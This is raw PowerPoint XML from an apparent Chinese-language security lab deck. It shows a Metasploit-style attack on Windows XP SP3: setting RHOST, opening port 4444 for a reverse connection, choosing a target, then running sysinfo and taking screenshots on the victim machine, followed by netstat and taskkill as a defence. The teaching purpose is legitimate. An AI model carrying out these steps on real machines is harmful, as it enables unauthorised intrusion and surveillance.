        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1584101" y="2717442"/>
            <a:ext cx="2768958" cy="21250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1C4C3515-81D1-483D-9808-8DE503F4EFFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4491868" y="3244334"/>
            <a:ext cx="6761408" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>列出所有選項，其中有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>yes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>的必填，在這裡還缺少</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>RHOSTS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>的參數</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24567870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C52726-A3FE-4953-9A95-ADE9738EEF10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>set RHOST IP</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="內容版面配置區 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A396790E-7132-4440-A534-7692F183333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t="28390" r="66203" b="64271"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="553792" y="2740615"/>
            <a:ext cx="11539470" cy="1376769"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文字方塊 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80996D5B-2265-4EB4-95E1-998FF42431E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5525036" y="4235670"/>
            <a:ext cx="4726547" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US"/>
              <a:t>給</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>RHOST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US"/>
              <a:t>值</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="156628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41289E-24E8-4E96-B267-79999195B4D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>攻擊端防火牆要允許</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Port 4444</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>進入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="內容版面配置區 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F20866A1-85ED-4B4C-A47F-1B9C047CCD3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3886" r="47591" b="30950"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="619259" y="2659488"/>
            <a:ext cx="11138537" cy="1770844"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D335AE5A-77A3-44E7-B64E-0B59DEA13217}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1018504" y="3090930"/>
            <a:ext cx="5077496" cy="2060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928996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29B130-B9CD-4BCC-970A-E769F0B9BC68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>手動指定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Target</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>33(XP SP3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>台灣正體</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US">
              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="內容版面配置區 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFAFB5FF-70E8-4C13-B346-BEF48272E9D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t="53940" r="45825" b="11367"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2395471"/>
            <a:ext cx="10065165" cy="3541690"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBD82C28-E5D7-4904-9536-4BE721F20D19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5074276" y="3915177"/>
            <a:ext cx="1403797" cy="2060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2103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latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>系統的資安威脅</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>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9956" y="1319404"/>
            <a:ext cx="5764439" cy="498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方塊 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3200400" y="6410325"/>
            <a:ext cx="5543550" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>https://money.udn.com/money/story/5612/5079055</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1232610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371B37-61F5-48DA-8404-59567C4522A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>sysinfo</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="內容版面配置區 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{278E479E-E08E-4892-A7B5-55319AB1905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4279" r="67321" b="10260"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="232894" y="1379212"/>
            <a:ext cx="6927761" cy="1801097"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="圖片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93403BC2-79F0-437D-8D4D-17A7CB100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5255" y="2202287"/>
            <a:ext cx="6065324" cy="4556537"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9CACA06-26A1-4710-95FB-1794A09B894F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7843234" y="3554569"/>
            <a:ext cx="3644721" cy="8886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E05CFDFC-4734-4B81-88EB-F73FDF4BA131}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3455562" y="3691908"/>
            <a:ext cx="3696237" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US"/>
              <a:t>了解系統資訊</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1573096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062466-EA2A-4D48-8098-6351B639C6D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>移動到桌面</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="內容版面配置區 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71B06EDD-453C-434E-A37B-1E73344F648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8894" r="71104" b="62705"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="712024" y="3145665"/>
            <a:ext cx="10641776" cy="1700012"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1061193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5A189B-C38C-4621-ADB4-FD4643FDE386}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>建一個資料夾</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="內容版面配置區 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{540340B8-CBF4-4454-8DA2-5B217BE14B2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8681" r="80902" b="63152"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1054665" y="2004442"/>
            <a:ext cx="3452942" cy="811369"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="圖片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48D27528-2974-4B01-B829-50B63272C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129565"/>
            <a:ext cx="4656220" cy="3497956"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="圖片 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E7A167A-2379-4708-AC20-172A32A970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7582" y="3129565"/>
            <a:ext cx="4656220" cy="3497956"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="箭號: 向下 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8FAFD14-E3B9-47AA-952A-7F067ED36A12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4720109" y="3831467"/>
            <a:ext cx="1886559" cy="174488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CCB4CBE9-0904-4BC4-B12B-BE70FD71FCD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7006107" y="2923504"/>
            <a:ext cx="746975" cy="7340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93288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051AB6-332E-4137-BF67-825ACB86F692}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>Take a screenshot</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="內容版面配置區 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8D9746E-49DE-4054-B13E-CC870C5AC9A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t="30406" r="83967" b="62522"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="426076" y="1690688"/>
            <a:ext cx="7627026" cy="1032163"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="圖片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BAA83C5-8B37-42A1-ADCB-84A9C4E4C09C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="2935" r="53177" b="27692"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3394655" y="3016251"/>
            <a:ext cx="8067542" cy="3667321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A250ACD-161C-438D-A873-8B08EC727521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3374265" y="4507606"/>
            <a:ext cx="2472743" cy="334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E3447BF6-83B0-4561-986E-DC8ED81925A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426076" y="1690688"/>
            <a:ext cx="7627026" cy="10321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接點 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{400F4830-2BF1-46A6-9AA2-9A043450333A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426076" y="2722851"/>
            <a:ext cx="2948189" cy="178475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5A69319A-DDDD-4446-8570-CB1BB13E49F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5867398" y="2722852"/>
            <a:ext cx="2185704" cy="178475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611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923925" y="2174875"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Windows defense: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>從</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>taskkill</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US">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2358633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CEB6AB-45B8-4D85-9038-913E1E4FC2D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>netstat -ano </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="內容版面配置區 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55A8E04C-B578-4D0E-8E44-2A3BEE4E83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5984" y="1690688"/>
            <a:ext cx="6343334" cy="4765391"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文字方塊 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EDE5840-D7C8-4CEE-B740-5A11A19E66D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2558870"/>
